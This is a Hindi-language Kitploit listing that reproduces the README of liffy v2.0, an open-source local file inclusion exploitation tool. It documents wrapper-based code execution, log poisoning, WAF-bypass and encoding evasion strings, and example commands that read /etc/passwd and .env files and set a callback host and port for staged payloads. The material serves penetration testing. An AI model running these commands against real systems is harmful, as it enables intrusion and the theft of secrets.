Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
liffy — स्थानीय फ़ाइल समावेशन शोषण उपकरण | Kitploit
उपकरण/GitHubGitHub/mzfr/liffy
भेद्यता विश्लेषणवेब एप्लिकेशन शोषणWAF बाईपासपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubmzfr/liffy

liffy

स्थानीय फ़ाइल समावेशन शोषण उपकरण

रिपॉजिटरी देखें
9781143 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

GitSpo Mentions License: GPL v3 Maintenance Rawsec's CyberSecurity Inventory

Packaging status


liffy

उन्नत LFI शोषण उपकरण

liffy कार्य करते हुए

स्थानीय फ़ाइल समावेशन (LFI) शोषण के लिए एक शक्तिशाली पायथन उपकरण, जिसमें उन्नत सुविधाएँ जैसे WAF बायपास, एन्कोडिंग तकनीक और व्यापक भेद्यता पहचान शामिल हैं।

Liffy v2.0, liffy का महत्वपूर्ण रूप से उन्नत संस्करण है, जो मूल रूप से rotlogix/liffy द्वारा बनाया गया था। इस संस्करण में Rich टर्मिनल आउटपुट, YAML कॉन्फ़िगरेशन, उन्नत थ्रेडिंग और कई उन्नत शोषण तकनीकें जैसी आधुनिक सुविधाएँ शामिल हैं।

⚠️ बहुत सारे नए बदलाव वाइब कोडेड थे।

विषयसूची

  • विशेषताएँ
  • स्थापना
  • उपयोग
  • कॉन्फ़िगरेशन
  • उन्नत तकनीकें
  • उदाहरण
  • योगदान
  • क्रेडिट्स

विशेषताएँ

मुख्य LFI तकनीकें

  • data:// - डेटा रैपर के माध्यम से कोड निष्पादन
  • expect:// - एक्सपेक्ट रैपर के माध्यम से कोड निष्पादन
  • input:// - इनपुट रैपर के माध्यम से कोड निष्पादन
  • filter:// - फ़िल्टर रैपर के माध्यम से मनमानी फ़ाइल पढ़ना
  • /proc/self/environ - CGI मोड में कोड निष्पादन
  • Apache access.log विषाक्तीकरण - लॉग फ़ाइल शोषण
  • Linux auth.log SSH विषाक्तीकरण - SSH लॉग शोषण
  • नल बाइट विषाक्तीकरण - लीगेसी PHP नल बाइट हमले
  • ZIP रैपर शोषण - ZIP फ़ाइल समावेशन हमले
  • रैपर पहचान - सामान्य LFI स्ट्रीम रैपरों के लिए सुरक्षित जाँच
  • आउट-ऑफ-बैंड जाँच - ब्लाइंड रैपर/SSRF-शैली व्यवहार के लिए कॉलबैक पेलोड
  • ब्लाइंड LFI जाँच - प्रतिक्रिया-अंतर जाँच जब फ़ाइल सामग्री परावर्तित नहीं होती
  • स्वचालित स्कैन मोड - ट्रैवर्सल, रैपर और ब्लाइंड जाँचों में सुरक्षित पहचान-प्रथम स्कैन योजना

उन्नत सुविधाएँ

  • WAF चोरी - सामान्य WAF के लिए कई बायपास तकनीकें
  • उन्नत एन्कोडिंग - डबल URL एन्कोडिंग, यूनिकोड, केस विविधताएँ
  • POST अनुरोध समर्थन - कस्टम डेटा के साथ पूर्ण POST विधि समर्थन
  • कस्टम हेडर - कॉन्फ़िगरेबल HTTP हेडर
  • यूज़र-एजेंट रोटेशन - पहचान से बचने के लिए यादृच्छिक यूज़र एजेंट
  • दर सीमित करना - कॉन्फ़िगरेबल अनुरोध थ्रॉटलिंग
  • मल्टी-थ्रेडिंग - उन्नत थ्रेड पूल प्रबंधन
  • पहचान मोड - शोषण के बिना भेद्यता स्कैनिंग
  • Rich टर्मिनल आउटपुट - प्रगति पट्टियों के साथ सुंदर रंगीन आउटपुट
  • YAML कॉन्फ़िगरेशन - स्थायी सेटिंग्स प्रबंधन

आधुनिक संवर्द्धन

  • उन्नत भेद्यता पहचान - विश्वास स्कोरिंग के साथ उन्नत प्रतिक्रिया विश्लेषण
  • थ्रेड पूल प्रबंधन - अनुकूली थ्रेडिंग के साथ अनुकूलित प्रदर्शन
  • कॉन्फ़िगरेशन प्रबंधन - CLI ओवरराइड के साथ YAML-आधारित सेटिंग्स
  • व्यापक लॉगिंग - विस्तृत निष्पादन रिपोर्ट और प्रगति ट्रैकिंग

स्थापना

सुनिश्चित करें कि आप पायथन 3 का उपयोग कर रहे हैं। Liffy पायथन 2 का समर्थन नहीं करता है। नीचे दिए गए उदाहरण uv run python का उपयोग करते हैं ताकि कमांड प्रोजेक्ट वातावरण के अंदर चलें।

root@kitploit:~
# uv इंस्टॉल करें यदि आपने पहले नहीं किया है
curl -LsSf https://astral.sh/uv/install.sh | sh

# रिपॉजिटरी क्लोन करें
git clone https://github.com/mzfr/liffy
cd liffy

# uv के साथ वर्चुअल एनवायरनमेंट बनाएं
uv venv

# pyproject.toml से निर्भरताएँ इंस्टॉल करें
uv sync

# liffy चलाएं
uv run python liffy.py --help

उपयोग

मूल सिंटैक्स

root@kitploit:~
uv run python liffy.py <URL> [विकल्प]

कमांड लाइन विकल्प

root@kitploit:~
usage: liffy.py [-h] [-d] [-i] [-e] [-f] [-p] [-a] [-ns] [-r] [--ssh]
                [-l LOCATION] [--cookies COOKIES] [-dt] [-t THREADS]
                [--detection] [--null-byte] [--zip] [--encoding]
                [--waf-bypass] [--method {GET,POST}] [--post-data POST_DATA]
                [--headers HEADERS] [--lhost LHOST] [--lport LPORT]
                [--read-file READ_FILE] [-y] [--timeout TIMEOUT]
                [--proxy PROXY] [--verify-tls] [--user-agent USER_AGENT]
                [--oob] [--oob-url OOB_URL] [--blind] [--auto]
                [--delay DELAY] [--retries RETRIES] [--json] [--output OUTPUT]
                [--quiet] [--no-color] [--no-banner] [--config]
                [url]

positional arguments:
  url                   LFI के लिए परीक्षण करने हेतु URL

मुख्य तकनीकें:
  -d, --data            data:// तकनीक का उपयोग करें
  -i, --input           input:// तकनीक का उपयोग करें
  -e, --expect          expect:// तकनीक का उपयोग करें
  -f, --filter          filter:// तकनीक का उपयोग करें
  -p, --proc            /proc/self/environ तकनीक का उपयोग करें
  -a, --access          Apache एक्सेस लॉग तकनीक
  --ssh                 SSH प्रमाणीकरण लॉग विषाक्तीकरण
  -dt, --directorytraverse  निर्देशिका ट्रैवर्सल के लिए परीक्षण
  --null-byte           नल बाइट विषाक्तीकरण के लिए परीक्षण
  --zip                 ZIP रैपर शोषण के लिए परीक्षण
  --wrappers, --wrapper सामान्य LFI स्ट्रीम रैपरों का पता लगाएं
  --wrapper-list WRAPPER_LIST
                        कस्टम रैपर जांच पेलोड सूची का पथ
  --oob                 आउट-ऑफ-बैंड कॉलबैक जांच भेजें
  --oob-url OOB_URL     OOB कॉलबैक आधार URL
  --blind               ब्लाइंड LFI प्रतिक्रिया-अंतर जांच चलाएं
  --blind-list BLIND_LIST
                        कस्टम ब्लाइंड LFI जांच सूची का पथ
  --auto                एक सुरक्षित स्वचालित स्कैन योजना चलाएं

उन्नत विकल्प:
  --encoding            उन्नत एन्कोडिंग/बायपास तकनीकों का उपयोग करें
  --waf-bypass          WAF चोरी तकनीकों का उपयोग करें
  --method {GET,POST}   HTTP विधि (डिफ़ॉल्ट: GET)
  --post-data POST_DATA POST डेटा (प्रारूप: key=value&key2=value2)
  --headers HEADERS     कस्टम हेडर (प्रारूप: Header1:Value1,Header2:Value2)
  --detection           केवल LFI पहचान करें, शोषण नहीं

अनुरोध विकल्प:
  --timeout TIMEOUT     HTTP अनुरोध टाइमआउट सेकंड में
  --proxy PROXY         HTTP(S) प्रॉक्सी URL, जैसे http://127.0.0.1:8080
  --verify-tls          असुरक्षित अनुरोधों का उपयोग करने के बजाय TLS प्रमाणपत्र सत्यापित करें
  --user-agent UA       कस्टम User-Agent हेडर
  --delay DELAY         अनुरोधों के बीच विलंब सेकंड में
  --retries RETRIES     प्रति अनुरोध HTTP पुनर्प्रयास

स्वचालन विकल्प:
  --lhost LHOST         स्टेज्ड पेलोड के लिए कॉलबैक होस्ट
  --lport LPORT         स्टेज्ड पेलोड के लिए कॉलबैक पोर्ट
  --read-file PATH      filter:// के साथ पढ़ने के लिए फ़ाइल पथ
  -y, --yes             संकेतों के लिए डिफ़ॉल्ट का उपयोग करें और गैर-संवादात्मक रूप से चलाएं
  --json                JSON रन सारांश प्रिंट करें
  --output OUTPUT       JSON रन सारांश फ़ाइल में लिखें
  --quiet               सामान्य टर्मिनल आउटपुट दबाएं

सामान्य विकल्प:
  -ns, --nostager       पेलोड को सीधे निष्पादित करें, स्टेजर का उपयोग न करें
  -r, --relative        हमले के लिए पथ ट्रैवर्सल अनुक्रमों का उपयोग करें
  -l, --location LOCATION  लक्ष्य फ़ाइल का पथ (एक्सेस लॉग, auth लॉग, आदि)
  --cookies COOKIES     प्रमाणीकरण के लिए सत्र कुकीज़
  -t, --threads THREADS उपयोग करने के लिए थ्रेड्स की संख्या (डिफ़ॉल्ट: 5)
  --no-color            रंगीन आउटपुट अक्षम करें
  --no-banner           बैनर प्रदर्शन अक्षम करें
  --config              डिफ़ॉल्ट YAML कॉन्फ़िगरेशन फ़ाइल बनाएं

कॉन्फ़िगरेशन

YAML कॉन्फ़िगरेशन

स्थायी सेटिंग्स के लिए एक कॉन्फ़िगरेशन फ़ाइल बनाएं:

root@kitploit:~
uv run python liffy.py --config

यह डिफ़ॉल्ट सेटिंग्स के साथ liffy_config.yaml बनाता है:

root@kitploit:~
# Liffy कॉन्फ़िगरेशन फ़ाइल
max_threads: 5
rate_limit_delay: 0.1
disable_colors: false
disable_banner: false
quiet: false
default_method: GET
user_agent_rotation: true
request_timeout: 15
proxy: null
verify_tls: false
retries: 0

डिफ़ॉल्ट रूप से स्टार्टअप बैनर/लोगो छुपाने के लिए disable_banner: true सेट करें। CLI झंडे अभी भी कॉन्फ़िग मानों को ओवरराइड करते हैं, इसलिए एकल रन के लिए आप --no-banner, --no-color, या --quiet का भी उपयोग कर सकते हैं।

पर्यावरण चर

आप पर्यावरण चर का भी उपयोग कर सकते हैं:

  • LIFFY_THREADS - थ्रेड्स की संख्या
  • LIFFY_RATE_LIMIT - दर सीमा विलंब
  • LIFFY_NO_COLOR - रंग अक्षम करें (true/false)

उन्नत तकनीकें

WAF बायपास तकनीकें

जब --waf-bypass सक्षम किया जाता है, liffy स्वचालित रूप से कई चोरी तकनीकों को लागू करता है:

  • टिप्पणी इंजेक्शन: /**/, #, ;
  • प्रोटोकॉल भ्रम: file:///, pHp://
  • एन्कोडिंग लेयरिंग: कई एन्कोडिंग संयोजन
  • पथ अस्पष्टता: ./, ../, नल बाइट्स

एन्कोडिंग बायपास तकनीकें

--encoding के साथ, liffy उन्नत एन्कोडिंग विधियाँ लागू करता है:

  • डबल URL एन्कोडिंग: %252e%252e%252f
  • यूनिकोड एन्कोडिंग: \u002e\u002e\u002f
  • मिश्रित केस: ..%2F, ..%2f
  • HTML एंटिटी एन्कोडिंग: &#46;&#46;&#47;

POST अनुरोध समर्थन

root@kitploit:~
# फॉर्म डेटा के साथ POST
uv run python liffy.py "http://target.com/lfi.php" -d --method POST --post-data "file=../../etc/passwd"

# कस्टम हेडर के साथ POST
uv run python liffy.py "http://target.com/lfi.php" -d --method POST --headers "X-Forwarded-For:127.0.0.1,Authorization:Bearer token123"

अनुरोध ट्यूनिंग

root@kitploit:~
# ट्रैफ़िक को स्थानीय प्रॉक्सी के माध्यम से भेजें और अस्थायी विफलताओं पर पुनः प्रयास करें
uv run python liffy.py "http://target.com/lfi.php?file=" -d \
  --proxy "http://127.0.0.1:8080" --timeout 20 --retries 2

# एक निश्चित User-Agent और कस्टम अनुरोध विलंब का उपयोग करें
uv run python liffy.py "http://target.com/lfi.php?file=" --detection -f \
  --user-agent "liffy/2.0" --delay 0.5

उदाहरण

मूल LFI परीक्षण

data:// रैपर से परीक्षण

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d

कई तकनीकों से परीक्षण

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d -i -e -f

केवल पहचान मोड

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --detection -d -i -e

उन्नत उपयोग

एन्कोडिंग के साथ WAF बायपास

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d --waf-bypass --encoding

दर सीमित के साथ मल्टी-थ्रेडेड

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d -t 10 --config

कस्टम हेडर के साथ POST अनुरोध

root@kitploit:~
uv run python liffy.py "http://example.com/upload.php" -d --method POST \
  --post-data "action=read&file=../../etc/passwd" \
  --headers "User-Agent:Mozilla/5.0,X-Forwarded-For:192.168.1.1"

लॉग विषाक्तीकरण

Apache एक्सेस लॉग विषाक्तीकरण

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -a

SSH प्रमाणीकरण लॉग विषाक्तीकरण

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --ssh

कस्टम लॉग स्थान

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -a -l "/var/log/apache2/access.log"

निर्देशिका ट्रैवर्सल

सापेक्ष पथ ट्रैवर्सल

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d -r

निर्देशिका ट्रैवर्सल परीक्षण

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -dt

विशेष तकनीकें

नल बाइट विषाक्तीकरण (लीगेसी PHP)

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --null-byte

ZIP रैपर शोषण

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --zip

सामान्य रैपर पहचान

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --wrappers

रैपर पहचान file://, php://filter, data://, php://temp, php://memory और संबंधित रैपरों के लिए सुरक्षित डिफ़ॉल्ट जांच का उपयोग करती है। zip://, phar://, और glob:// को सूचनात्मक/सशर्त माना जाता है क्योंकि उन्हें आमतौर पर लक्ष्य-पक्ष फ़ाइलों या सिंक व्यवहार की आवश्यकता होती है जो सूची प्रकट करता है।

आप एक कस्टम रैपर पेलोड सूची प्रदान कर सकते हैं। यदि --wrapper-list छोड़ दिया जाता है, तो liffy अंतर्निहित जांच पर वापस आ जाता है:

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --wrapper \
  --wrapper-list payload_wordlists/wrappers.txt

प्रत्येक गैर-रिक्त पंक्ति या तो एक कच्चा पेलोड या name=payload हो सकती है:

root@kitploit:~
php-filter-passwd=php://filter/read=convert.base64-encode/resource=/etc/passwd
file-winini=file:///c:/windows/win.ini

आउट-ऑफ-बैंड कॉलबैक जांच

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --oob \
  --oob-url "https://example.oast.site"

इसे HTTP/DNS कॉलबैक श्रोता के साथ उपयोग करें। Liffy URL-रैपर शैली के पेलोड भेजता है और आप सत्यापित करते हैं कि लक्ष्य वापस कॉल करता है या नहीं।

ब्लाइंड LFI जांच

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --blind

ब्लाइंड जांच मौजूदा-फ़ाइल जांच की तुलना यादृच्छिक गुम-फ़ाइल आधार रेखाओं से करती है और स्थिति, लंबाई, या समय अंतर की रिपोर्ट करती है जब सामग्री सीधे प्रतिबिंबित नहीं होती है।

आप एक कस्टम ब्लाइंड जांच सूची प्रदान कर सकते हैं। यदि --blind-list छोड़ दिया जाता है या खाली है, तो liffy अंतर्निहित जांच का उपयोग करता है:

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --blind \
  --blind-list payload_wordlists/blind_lfi.txt

प्रत्येक गैर-रिक्त पंक्ति या तो एक कच्चा पेलोड या name=payload हो सकती है:

root@kitploit:~
linux-passwd=/etc/passwd
proc-environ=/proc/self/environ
laravel-env=.env

सुरक्षित स्वचालित स्कैन

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --auto

--auto केवल-पहचान निर्देशिका ट्रैवर्सल, रैपर जांच और ब्लाइंड जांच को सक्षम करता है। यदि --oob-url भी प्रदान किया गया है, तो इसमें OOB जांच शामिल होती है।

सभी तकनीकों के साथ व्यापक स्कैन

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" \
  -d -i -e -f -p -a --ssh -dt --null-byte --zip --wrappers --blind \
  --encoding --waf-bypass --detection

प्रमाणीकरण और कुकीज़

सत्र कुकीज़ का उपयोग करना

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d \
  --cookies "PHPSESSID=abc123; auth_token=xyz789"

स्क्रिप्टेड / गैर-संवादात्मक उपयोग

संकेत के बिना कॉलबैक मान प्रदान करें

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d \
  --lhost 10.10.14.2 --lport 4444 --yes

बिना संकेत के filter:// के साथ एक विशिष्ट फ़ाइल पढ़ें

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -f \
  --read-file /etc/passwd --yes

संरचित आउटपुट

JSON रन सारांश प्रिंट करें

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --detection -f --json

टर्मिनल आउटपुट रखते हुए JSON सारांश डिस्क पर लिखें

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --detection -f \
  --output findings.json

आउटपुट नियंत्रण

रंग और बैनर अक्षम करें

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d --no-color --no-banner

सामान्य टर्मिनल आउटपुट दबाएं

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --detection -f --quiet --output findings.json

डिफ़ॉल्ट फ़ाइल स्थान

जब कोई कस्टम पथ निर्दिष्ट नहीं किया जाता है तो निम्नलिखित डिफ़ॉल्ट स्थानों का उपयोग किया जाता है:

  • SSH auth.log: /var/log/auth.log
  • Apache access.log: /var/log/apache2/access.log
  • वैकल्पिक Apache लॉग: /var/log/httpd/access_log

योगदान

हम योगदान का स्वागत करते हैं! यहां बताया गया है कि आप कैसे मदद कर सकते हैं:

सुविधा सुझाव

  • नई LFI शोषण तकनीकें
  • अतिरिक्त WAF बायपास विधियाँ
  • उन्नत एन्कोडिंग तकनीकें
  • पेलोड अनुकूलन
  • पहचान सुधार

बग रिपोर्ट

  • GitHub Issues के माध्यम से बग रिपोर्ट करें
  • विस्तृत पुनरुत्पादन चरण शामिल करें
  • लक्ष्य वातावरण विवरण प्रदान करें

पुल अनुरोध

  • रिपॉजिटरी को फोर्क करें
  • एक सुविधा शाखा बनाएं
  • परीक्षणों के साथ अपने परिवर्तन करें
  • एक पुल अनुरोध सबमिट करें

किसी भी प्रश्न या सुझाव के लिए बेझिझक एक मुद्दा खोलें!

भेद्यता पहचान

Liffy का पहचान मोड व्यापक भेद्यता विश्लेषण प्रदान करता है:

विश्वास स्कोरिंग

  • उच्च विश्वास (80-100%): मजबूत संकेत जैसे /etc/passwd सामग्री
  • मध्यम विश्वास (50-79%): आंशिक फ़ाइल सामग्री या संदिग्ध प्रतिक्रियाएँ
  • कम विश्वास (20-49%): संभावित संकेत जिनके लिए मैन्युअल सत्यापन की आवश्यकता है

पहचान सुविधाएँ

  • फ़ाइल सामग्री विश्लेषण: Linux, Windows और PHP फ़ाइल पैटर्न को पहचानता है
  • प्रतिक्रिया विश्लेषण: HTTP स्थिति कोड, सामग्री लंबाई, समय विश्लेषण
  • WAF पहचान: सामान्य WAF हस्ताक्षरों की पहचान करता है
  • साक्ष्य संग्रह: रिपोर्टिंग के लिए भेद्यता का प्रमाण कैप्चर करता है

नमूना पहचान आउटपुट

root@kitploit:~
[+] भेद्यता सारांश
==================================================
[1] भेद्यता पाई गई
    पेलोड: ../../etc/passwd
    विश्वास: 85%
    साक्ष्य: Linux /etc/passwd फ़ाइल: root:
    स्थिति कोड: 200
    सामग्री लंबाई: 1547

समस्या निवारण

सामान्य समस्याएँ

WAF अनुरोधों को अवरुद्ध कर रहा है

root@kitploit:~
# WAF बायपास तकनीकों का उपयोग करें
uv run python liffy.py "http://target.com/lfi.php" -d --waf-bypass

# थ्रेड गिनती कम करें और विलंब बढ़ाएं
uv run python liffy.py "http://target.com/lfi.php" -d -t 1

दर सीमा की समस्याएँ

root@kitploit:~
# कॉन्फ़िग फ़ाइल में विलंब बढ़ाएं
max_threads: 2
rate_limit_delay: 1.0

डिबग मोड

वर्बोज़ आउटपुट के लिए, आप कॉन्फ़िगरेशन को संशोधित कर सकते हैं:

root@kitploit:~
debug_mode: true
verbose_output: true

सुरक्षा सूचना

Liffy केवल अधिकृत सुरक्षा परीक्षण के लिए डिज़ाइन किया गया है।

  • केवल उन सिस्टम पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति है
  • जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें
  • दर सीमाओं का सम्मान करें और DoS स्थितियों से बचें
  • अपने अधिकार क्षेत्र में कानूनी निहितार्थों से अवगत रहें

लेखक इस उपकरण के दुरुपयोग के लिए जिम्मेदार नहीं हैं।

क्रेडिट्स

मूल प्रेरणा

  • hvqzao द्वारा मूल liffy
  • rotlogix/liffy से प्रारंभिक अवधारणा

तकनीकें और अनुसंधान

  • विभिन्न सुरक्षा अनुसंधान से LFI शोषण तकनीकें
  • सार्वजनिक सुरक्षा संसाधनों से WAF बायपास विधियाँ
  • PHP रैपर शोषण दस्तावेज़ीकरण

डिज़ाइन और संपत्ति

  • renderforest से लोगो डिज़ाइन
  • Rich लाइब्रेरी का उपयोग कर टर्मिनल स्टाइलिंग

लाइसेंस

यह प्रोजेक्ट GNU जनरल पब्लिक लाइसेंस v3.0 के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

टूल डाउनलोड करें